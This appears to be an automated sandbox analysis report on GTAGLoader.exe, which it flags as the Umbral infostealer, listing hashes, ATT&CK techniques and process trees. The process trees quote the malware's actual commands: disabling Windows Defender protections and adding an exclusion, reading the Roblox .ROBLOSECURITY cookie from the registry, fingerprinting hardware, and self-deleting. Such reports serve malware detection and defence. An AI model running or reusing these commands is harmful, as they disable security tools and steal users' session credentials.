Analysis
-
max time kernel
100s -
max time network
149s -
platform
windows10-ltsc 2021_x64 -
resource
win10ltsc2021-20241023-en -
resource tags
arch:x64arch:x86image:win10ltsc2021-20241023-enlocale:en-usos:windows10-ltsc 2021-x64system -
submitted
02-11-2024 20:47
Behavioral task
behavioral1
Sample
GTAGLoader.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral2
Sample
GTAGLoader.exe
Resource
win10ltsc2021-20241023-en
General
-
Target
GTAGLoader.exe
-
Size
229KB
-
MD5
18cb3d1a221a079d9b499f2eec3a3e64
-
SHA1
5fb17f7e655b5cb79be1099c8ea550ac1f5ace1f
-
SHA256
e22bde6d04787794012e7e12ceaf1cf8fdf145f81551d90febf6a4f9c5d4e029
-
SHA512
ca4fdb1e0bbf0d63667d5faa71f691efa4f1a629ca391665d0c361ce84876fc2fd0962b3a2c8bb8735e09931cc4401f912dece4e43f325fa8fe56b5c24630b03
-
SSDEEP
6144:lloZM9rIkd8g+EtXHkv/iD4uNKIkqNlO+LWU1pAOqb8e1mSi:noZOL+EP8uNKIkqNlO+LWU1pAxQ
Malware Config
Signatures
-
Detect Umbral payload 1 IoCs
Processes:
resource yara_rule behavioral2/memory/1748-1-0x0000025DC96B0000-0x0000025DC96F0000-memory.dmp family_umbral -
Umbral family
-
Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepid process 1440 powershell.exe 2192 powershell.exe 1672 powershell.exe 2380 powershell.exe -
Drops file in Drivers directory 1 IoCs
Processes:
GTAGLoader.exedescription ioc process File opened for modification C:\Windows\System32\drivers\etc\hosts GTAGLoader.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 20 ip-api.com -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
Processes:
cmd.exePING.EXEpid process 908 cmd.exe 1192 PING.EXE -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
-
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 26 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exewmic.exewmic.exewmic.exepowershell.exewmic.exepid process 1440 powershell.exe 1440 powershell.exe 2192 powershell.exe 2192 powershell.exe 1672 powershell.exe 1672 powershell.exe 2120 powershell.exe 2120 powershell.exe 2668 wmic.exe 2668 wmic.exe 2668 wmic.exe 2668 wmic.exe 3844 wmic.exe 3844 wmic.exe 3844 wmic.exe 3844 wmic.exe 1036 wmic.exe 1036 wmic.exe 1036 wmic.exe 1036 wmic.exe 2380 powershell.exe 2380 powershell.exe 820 wmic.exe 820 wmic.exe 820 wmic.exe 820 wmic.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
GTAGLoader.exepowershell.exepowershell.exepowershell.exepowershell.exewmic.exedescription pid process Token: SeDebugPrivilege 1748 GTAGLoader.exe Token: SeDebugPrivilege 1440 powershell.exe Token: SeIncreaseQuotaPrivilege 1440 powershell.exe Token: SeSecurityPrivilege 1440 powershell.exe Token: SeTakeOwnershipPrivilege 1440 powershell.exe Token: SeLoadDriverPrivilege 1440 powershell.exe Token: SeSystemProfilePrivilege 1440 powershell.exe Token: SeSystemtimePrivilege 1440 powershell.exe Token: SeProfSingleProcessPrivilege 1440 powershell.exe Token: SeIncBasePriorityPrivilege 1440 powershell.exe Token: SeCreatePagefilePrivilege 1440 powershell.exe Token: SeBackupPrivilege 1440 powershell.exe Token: SeRestorePrivilege 1440 powershell.exe Token: SeShutdownPrivilege 1440 powershell.exe Token: SeDebugPrivilege 1440 powershell.exe Token: SeSystemEnvironmentPrivilege 1440 powershell.exe Token: SeRemoteShutdownPrivilege 1440 powershell.exe Token: SeUndockPrivilege 1440 powershell.exe Token: SeManageVolumePrivilege 1440 powershell.exe Token: 33 1440 powershell.exe Token: 34 1440 powershell.exe Token: 35 1440 powershell.exe Token: 36 1440 powershell.exe Token: SeDebugPrivilege 2192 powershell.exe Token: SeDebugPrivilege 1672 powershell.exe Token: SeDebugPrivilege 2120 powershell.exe Token: SeIncreaseQuotaPrivilege 2668 wmic.exe Token: SeSecurityPrivilege 2668 wmic.exe Token: SeTakeOwnershipPrivilege 2668 wmic.exe Token: SeLoadDriverPrivilege 2668 wmic.exe Token: SeSystemProfilePrivilege 2668 wmic.exe Token: SeSystemtimePrivilege 2668 wmic.exe Token: SeProfSingleProcessPrivilege 2668 wmic.exe Token: SeIncBasePriorityPrivilege 2668 wmic.exe Token: SeCreatePagefilePrivilege 2668 wmic.exe Token: SeBackupPrivilege 2668 wmic.exe Token: SeRestorePrivilege 2668 wmic.exe Token: SeShutdownPrivilege 2668 wmic.exe Token: SeDebugPrivilege 2668 wmic.exe Token: SeSystemEnvironmentPrivilege 2668 wmic.exe Token: SeRemoteShutdownPrivilege 2668 wmic.exe Token: SeUndockPrivilege 2668 wmic.exe Token: SeManageVolumePrivilege 2668 wmic.exe Token: 33 2668 wmic.exe Token: 34 2668 wmic.exe Token: 35 2668 wmic.exe Token: 36 2668 wmic.exe Token: SeIncreaseQuotaPrivilege 2668 wmic.exe Token: SeSecurityPrivilege 2668 wmic.exe Token: SeTakeOwnershipPrivilege 2668 wmic.exe Token: SeLoadDriverPrivilege 2668 wmic.exe Token: SeSystemProfilePrivilege 2668 wmic.exe Token: SeSystemtimePrivilege 2668 wmic.exe Token: SeProfSingleProcessPrivilege 2668 wmic.exe Token: SeIncBasePriorityPrivilege 2668 wmic.exe Token: SeCreatePagefilePrivilege 2668 wmic.exe Token: SeBackupPrivilege 2668 wmic.exe Token: SeRestorePrivilege 2668 wmic.exe Token: SeShutdownPrivilege 2668 wmic.exe Token: SeDebugPrivilege 2668 wmic.exe Token: SeSystemEnvironmentPrivilege 2668 wmic.exe Token: SeRemoteShutdownPrivilege 2668 wmic.exe Token: SeUndockPrivilege 2668 wmic.exe Token: SeManageVolumePrivilege 2668 wmic.exe -
Suspicious use of WriteProcessMemory 24 IoCs
Processes:
GTAGLoader.execmd.exedescription pid process target process PID 1748 wrote to memory of 2976 1748 GTAGLoader.exe attrib.exe PID 1748 wrote to memory of 2976 1748 GTAGLoader.exe attrib.exe PID 1748 wrote to memory of 1440 1748 GTAGLoader.exe powershell.exe PID 1748 wrote to memory of 1440 1748 GTAGLoader.exe powershell.exe PID 1748 wrote to memory of 2192 1748 GTAGLoader.exe powershell.exe PID 1748 wrote to memory of 2192 1748 GTAGLoader.exe powershell.exe PID 1748 wrote to memory of 1672 1748 GTAGLoader.exe powershell.exe PID 1748 wrote to memory of 1672 1748 GTAGLoader.exe powershell.exe PID 1748 wrote to memory of 2120 1748 GTAGLoader.exe powershell.exe PID 1748 wrote to memory of 2120 1748 GTAGLoader.exe powershell.exe PID 1748 wrote to memory of 2668 1748 GTAGLoader.exe wmic.exe PID 1748 wrote to memory of 2668 1748 GTAGLoader.exe wmic.exe PID 1748 wrote to memory of 3844 1748 GTAGLoader.exe wmic.exe PID 1748 wrote to memory of 3844 1748 GTAGLoader.exe wmic.exe PID 1748 wrote to memory of 1036 1748 GTAGLoader.exe wmic.exe PID 1748 wrote to memory of 1036 1748 GTAGLoader.exe wmic.exe PID 1748 wrote to memory of 2380 1748 GTAGLoader.exe powershell.exe PID 1748 wrote to memory of 2380 1748 GTAGLoader.exe powershell.exe PID 1748 wrote to memory of 820 1748 GTAGLoader.exe wmic.exe PID 1748 wrote to memory of 820 1748 GTAGLoader.exe wmic.exe PID 1748 wrote to memory of 908 1748 GTAGLoader.exe cmd.exe PID 1748 wrote to memory of 908 1748 GTAGLoader.exe cmd.exe PID 908 wrote to memory of 1192 908 cmd.exe PING.EXE PID 908 wrote to memory of 1192 908 cmd.exe PING.EXE -
Views/modifies file attributes 1 TTPs 1 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\GTAGLoader.exe"C:\Users\Admin\AppData\Local\Temp\GTAGLoader.exe"1⤵
- Drops file in Drivers directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1748 -
C:\Windows\SYSTEM32\attrib.exe"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\GTAGLoader.exe"2⤵
- Views/modifies file attributes
PID:2976
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\GTAGLoader.exe'2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1440
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 22⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2192
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1672
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2120
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" os get Caption2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2668
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory2⤵
- Suspicious behavior: EnumeratesProcesses
PID:3844
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid2⤵
- Suspicious behavior: EnumeratesProcesses
PID:1036
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:2380
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic" path win32_VideoController get name2⤵
- Detects videocard installed
- Suspicious behavior: EnumeratesProcesses
PID:820
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\GTAGLoader.exe" && pause2⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
PID:908 -
C:\Windows\system32\PING.EXEping localhost3⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:1192
-
-
Network
MITRE ATT&CK Enterprise v15
Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
1Credentials In Files
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD53eb3833f769dd890afc295b977eab4b4
SHA1e857649b037939602c72ad003e5d3698695f436f
SHA256c485a6e2fd17c342fca60060f47d6a5655a65a412e35e001bb5bf88d96e6e485
SHA512c24bbc8f278478d43756807b8c584d4e3fb2289db468bc92986a489f74a8da386a667a758360a397e77e018e363be8912ac260072fa3e31117ad0599ac749e72
-
Filesize
1KB
MD56a807b1c91ac66f33f88a787d64904c1
SHA183c554c7de04a8115c9005709e5cd01fca82c5d3
SHA256155314c1c86d8d4e5b802f1eef603c5dd4a2f7c949f069a38af5ba4959bd8256
SHA51229f2d9f30fc081e7fe6e9fb772c810c9be0422afdc6aff5a286f49a990ededebcf0d083798c2d9f41ad8434393c6d0f5fa6df31226d9c3511ba2a41eb4a65200
-
Filesize
948B
MD584f977303c3e41c187944182c59f9e1a
SHA1bfa6a10cbf2dfc418b5bc03c3c8e7968d28cf145
SHA256873a2a2e155d0d13e2aac7091298cc21cdfa0b646792e03af792e26539edd2cf
SHA5125678c96497cdc4a0691243b09a5bedd3979e5323dab0cc08118e2992f3eb57c06a17231f131c372d3429ad2de115854cf08e33c3170803f11ec02350c4106596
-
Filesize
1KB
MD58e1fdd1b66d2fee9f6a052524d4ddca5
SHA10a9d0994559d1be2eecd8b0d6960540ca627bdb6
SHA2564cc7c1b79d1b48582d4dc27ca8c31457b9bf2441deb7914399bb9e6863f18b13
SHA5125a5494b878b08e8515811ab7a3d68780dac7423f5562477d98249a8bedf7ec98567b7cd5d4c6967d6bc63f2d6d9b7da9a65e0eb29d4b955026b469b5b598d1f3
-
Filesize
1KB
MD5876febf24f7121997c91ff27fe1243f0
SHA1d64b8df55e23b3d9e893a5def6506d464e7a2686
SHA256dd376e9b33fb0bad4a35ef76c52cab42f2a34f3db9aa1a48b934579f9810923e
SHA51206145c3e3639697ef0303682390fdb3c51b9e60fb3e69c135dfe352a9b4961fd2c0416f030bd2b6952b06067997bc8dfa4319784bff32b9aef596fa06dd9820e
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82